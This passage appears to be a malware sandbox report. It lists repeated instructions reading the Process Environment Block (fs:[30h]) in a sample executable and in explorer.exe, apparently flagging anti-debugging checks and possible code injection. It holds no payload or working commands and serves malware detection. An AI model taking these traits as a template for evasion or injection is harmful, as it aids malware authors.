          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7FF60 mov eax, dword ptr fs:[00000030h]1_2_00A7FF60
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38F6A mov eax, dword ptr fs:[00000030h]1_2_00B38F6A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7EF40 mov eax, dword ptr fs:[00000030h]1_2_00A7EF40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494849B mov eax, dword ptr fs:[00000030h]7_2_0494849B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F14FB mov eax, dword ptr fs:[00000030h]7_2_049F14FB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6CF0 mov eax, dword ptr fs:[00000030h]7_2_049B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6CF0 mov eax, dword ptr fs:[00000030h]7_2_049B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6CF0 mov eax, dword ptr fs:[00000030h]7_2_049B6CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08CD6 mov eax, dword ptr fs:[00000030h]7_2_04A08CD6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]7_2_049B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]7_2_049B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]7_2_049B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]7_2_049B6C0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]7_2_049F1C06
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0740D mov eax, dword ptr fs:[00000030h]7_2_04A0740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0740D mov eax, dword ptr fs:[00000030h]7_2_04A0740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0740D mov eax, dword ptr fs:[00000030h]7_2_04A0740D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496BC2C mov eax, dword ptr fs:[00000030h]7_2_0496BC2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CC450 mov eax, dword ptr fs:[00000030h]7_2_049CC450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CC450 mov eax, dword ptr fs:[00000030h]7_2_049CC450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A44B mov eax, dword ptr fs:[00000030h]7_2_0496A44B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495746D mov eax, dword ptr fs:[00000030h]7_2_0495746D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A005AC mov eax, dword ptr fs:[00000030h]7_2_04A005AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A005AC mov eax, dword ptr fs:[00000030h]7_2_04A005AC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496FD9B mov eax, dword ptr fs:[00000030h]7_2_0496FD9B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496FD9B mov eax, dword ptr fs:[00000030h]7_2_0496FD9B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]7_2_04962581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]7_2_04962581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]7_2_04962581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]7_2_04962581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]7_2_04932D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]7_2_04932D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]7_2_04932D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]7_2_04932D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]7_2_04932D8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04961DB5 mov eax, dword ptr fs:[00000030h]7_2_04961DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04961DB5 mov eax, dword ptr fs:[00000030h]7_2_04961DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04961DB5 mov eax, dword ptr fs:[00000030h]7_2_04961DB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049635A1 mov eax, dword ptr fs:[00000030h]7_2_049635A1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]7_2_049B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]7_2_049B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]7_2_049B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov ecx, dword ptr fs:[00000030h]7_2_049B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]7_2_049B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]7_2_049B6DC9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049E8DF1 mov eax, dword ptr fs:[00000030h]7_2_049E8DF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494D5E0 mov eax, dword ptr fs:[00000030h]7_2_0494D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494D5E0 mov eax, dword ptr fs:[00000030h]7_2_0494D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]7_2_049FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]7_2_049FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]7_2_049FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]7_2_049FFDE2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08D34 mov eax, dword ptr fs:[00000030h]7_2_04A08D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]7_2_04943D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AD30 mov eax, dword ptr fs:[00000030h]7_2_0493AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FE539 mov eax, dword ptr fs:[00000030h]7_2_049FE539
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049BA537 mov eax, dword ptr fs:[00000030h]7_2_049BA537
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04964D3B mov eax, dword ptr fs:[00000030h]7_2_04964D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04964D3B mov eax, dword ptr fs:[00000030h]7_2_04964D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04964D3B mov eax, dword ptr fs:[00000030h]7_2_04964D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04957D50 mov eax, dword ptr fs:[00000030h]7_2_04957D50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04973D43 mov eax, dword ptr fs:[00000030h]7_2_04973D43
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B3540 mov eax, dword ptr fs:[00000030h]7_2_049B3540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495C577 mov eax, dword ptr fs:[00000030h]7_2_0495C577
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495C577 mov eax, dword ptr fs:[00000030h]7_2_0495C577
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A00EA5 mov eax, dword ptr fs:[00000030h]7_2_04A00EA5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A00EA5 mov eax, dword ptr fs:[00000030h]7_2_04A00EA5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A00EA5 mov eax, dword ptr fs:[00000030h]7_2_04A00EA5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CFE87 mov eax, dword ptr fs:[00000030h]7_2_049CFE87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B46A7 mov eax, dword ptr fs:[00000030h]7_2_049B46A7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04978EC7 mov eax, dword ptr fs:[00000030h]7_2_04978EC7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049636CC mov eax, dword ptr fs:[00000030h]7_2_049636CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049EFEC0 mov eax, dword ptr fs:[00000030h]7_2_049EFEC0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08ED6 mov eax, dword ptr fs:[00000030h]7_2_04A08ED6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049616E0 mov ecx, dword ptr fs:[00000030h]7_2_049616E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049476E2 mov eax, dword ptr fs:[00000030h]7_2_049476E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A61C mov eax, dword ptr fs:[00000030h]7_2_0496A61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A61C mov eax, dword ptr fs:[00000030h]7_2_0496A61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C600 mov eax, dword ptr fs:[00000030h]7_2_0493C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C600 mov eax, dword ptr fs:[00000030h]7_2_0493C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C600 mov eax, dword ptr fs:[00000030h]7_2_0493C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04968E00 mov eax, dword ptr fs:[00000030h]7_2_04968E00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1608 mov eax, dword ptr fs:[00000030h]7_2_049F1608
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049EFE3F mov eax, dword ptr fs:[00000030h]7_2_049EFE3F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493E620 mov eax, dword ptr fs:[00000030h]7_2_0493E620
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]7_2_04947E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]7_2_04947E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]7_2_04947E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]7_2_04947E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]7_2_04947E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04947E41 mov eax, dword ptr fs:[00000030h]7_2_04947E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAE44 mov eax, dword ptr fs:[00000030h]7_2_049FAE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAE44 mov eax, dword ptr fs:[00000030h]7_2_049FAE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]7_2_0495AE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]7_2_0495AE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]7_2_0495AE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]7_2_0495AE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495AE73 mov eax, dword ptr fs:[00000030h]7_2_0495AE73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494766D mov eax, dword ptr fs:[00000030h]7_2_0494766D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04948794 mov eax, dword ptr fs:[00000030h]7_2_04948794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7794 mov eax, dword ptr fs:[00000030h]7_2_049B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7794 mov eax, dword ptr fs:[00000030h]7_2_049B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7794 mov eax, dword ptr fs:[00000030h]7_2_049B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049737F5 mov eax, dword ptr fs:[00000030h]7_2_049737F5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495F716 mov eax, dword ptr fs:[00000030h]7_2_0495F716
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CFF10 mov eax, dword ptr fs:[00000030h]7_2_049CFF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CFF10 mov eax, dword ptr fs:[00000030h]7_2_049CFF10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A70E mov eax, dword ptr fs:[00000030h]7_2_0496A70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A70E mov eax, dword ptr fs:[00000030h]7_2_0496A70E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496E730 mov eax, dword ptr fs:[00000030h]7_2_0496E730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0070D mov eax, dword ptr fs:[00000030h]7_2_04A0070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0070D mov eax, dword ptr fs:[00000030h]7_2_04A0070D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04934F2E mov eax, dword ptr fs:[00000030h]7_2_04934F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04934F2E mov eax, dword ptr fs:[00000030h]7_2_04934F2E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08F6A mov eax, dword ptr fs:[00000030h]7_2_04A08F6A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494EF40 mov eax, dword ptr fs:[00000030h]7_2_0494EF40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494FF60 mov eax, dword ptr fs:[00000030h]7_2_0494FF60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939080 mov eax, dword ptr fs:[00000030h]7_2_04939080
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B3884 mov eax, dword ptr fs:[00000030h]7_2_049B3884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B3884 mov eax, dword ptr fs:[00000030h]7_2_049B3884
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496F0BF mov ecx, dword ptr fs:[00000030h]7_2_0496F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496F0BF mov eax, dword ptr fs:[00000030h]7_2_0496F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496F0BF mov eax, dword ptr fs:[00000030h]7_2_0496F0BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A0 mov eax, dword ptr fs:[00000030h]7_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049790AF mov eax, dword ptr fs:[00000030h]7_2_049790AF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]7_2_049CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov ecx, dword ptr fs:[00000030h]7_2_049CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]7_2_049CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]7_2_049CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]7_2_049CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CB8D0 mov eax, dword ptr fs:[00000030h]7_2_049CB8D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049358EC mov eax, dword ptr fs:[00000030h]7_2_049358EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7016 mov eax, dword ptr fs:[00000030h]7_2_049B7016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7016 mov eax, dword ptr fs:[00000030h]7_2_049B7016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B7016 mov eax, dword ptr fs:[00000030h]7_2_049B7016
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A04015 mov eax, dword ptr fs:[00000030h]7_2_04A04015
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A04015 mov eax, dword ptr fs:[00000030h]7_2_04A04015
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]7_2_0496002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]7_2_0496002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]7_2_0496002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]7_2_0496002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496002D mov eax, dword ptr fs:[00000030h]7_2_0496002D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]7_2_0494B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]7_2_0494B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]7_2_0494B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B02A mov eax, dword ptr fs:[00000030h]7_2_0494B02A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04950050 mov eax, dword ptr fs:[00000030h]7_2_04950050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04950050 mov eax, dword ptr fs:[00000030h]7_2_04950050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A01074 mov eax, dword ptr fs:[00000030h]7_2_04A01074
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F2073 mov eax, dword ptr fs:[00000030h]7_2_049F2073
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962990 mov eax, dword ptr fs:[00000030h]7_2_04962990
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A185 mov eax, dword ptr fs:[00000030h]7_2_0496A185
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495C182 mov eax, dword ptr fs:[00000030h]7_2_0495C182
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]7_2_049B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]7_2_049B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]7_2_049B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B51BE mov eax, dword ptr fs:[00000030h]7_2_049B51BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049661A0 mov eax, dword ptr fs:[00000030h]7_2_049661A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049661A0 mov eax, dword ptr fs:[00000030h]7_2_049661A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B69A6 mov eax, dword ptr fs:[00000030h]7_2_049B69A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B1E1 mov eax, dword ptr fs:[00000030h]7_2_0493B1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B1E1 mov eax, dword ptr fs:[00000030h]7_2_0493B1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B1E1 mov eax, dword ptr fs:[00000030h]7_2_0493B1E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049C41E8 mov eax, dword ptr fs:[00000030h]7_2_049C41E8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939100 mov eax, dword ptr fs:[00000030h]7_2_04939100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939100 mov eax, dword ptr fs:[00000030h]7_2_04939100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04939100 mov eax, dword ptr fs:[00000030h]7_2_04939100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496513A mov eax, dword ptr fs:[00000030h]7_2_0496513A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496513A mov eax, dword ptr fs:[00000030h]7_2_0496513A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]7_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]7_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]7_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov eax, dword ptr fs:[00000030h]7_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04954120 mov ecx, dword ptr fs:[00000030h]7_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495B944 mov eax, dword ptr fs:[00000030h]7_2_0495B944
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495B944 mov eax, dword ptr fs:[00000030h]7_2_0495B944
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B171 mov eax, dword ptr fs:[00000030h]7_2_0493B171
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493B171 mov eax, dword ptr fs:[00000030h]7_2_0493B171
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493C962 mov eax, dword ptr fs:[00000030h]7_2_0493C962
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496D294 mov eax, dword ptr fs:[00000030h]7_2_0496D294
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496D294 mov eax, dword ptr fs:[00000030h]7_2_0496D294
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494AAB0 mov eax, dword ptr fs:[00000030h]7_2_0494AAB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494AAB0 mov eax, dword ptr fs:[00000030h]7_2_0494AAB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496FAB0 mov eax, dword ptr fs:[00000030h]7_2_0496FAB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]7_2_049352A5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]7_2_049352A5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]7_2_049352A5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]7_2_049352A5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049352A5 mov eax, dword ptr fs:[00000030h]7_2_049352A5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962ACB mov eax, dword ptr fs:[00000030h]7_2_04962ACB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962AE4 mov eax, dword ptr fs:[00000030h]7_2_04962AE4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]7_2_04935210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov ecx, dword ptr fs:[00000030h]7_2_04935210
